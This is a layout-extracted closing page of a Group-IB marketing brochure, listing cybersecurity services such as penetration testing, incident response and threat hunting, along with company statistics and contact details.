• Data leaks
•
• Sophisticated attacks against
critical infrastructure
• Penetration Testing
• Source code analysis
• Compromise Assessment
• Red Teaming engagements
• Incident Response Readiness
Assessment
• Compliance Auditing
• Incident Response
• Malware analysis
• Threat Hunting and more
• Digital hygiene
• Personal cybersecurity
• Reputation management and more
• CERT-GIB: 24/7 incident
response center
• Proactive threat hunting
• On-prem incident response
for complex attacks
• Investigation subscription
world-class
experts
hours of incident
response
successful investigations
worldwide
practical
experience
550+ 70,000+ 1,300+ 18 years
FORRESTER
GARTNER
www.group-ib.com
group-ib.com/blog/
info@group-ib.com
+65 31 59 37 98
twitter.com/groupib_gib
PREVENTING
AND INVESTIGATING
CYBERCRIME
SINCE 2003
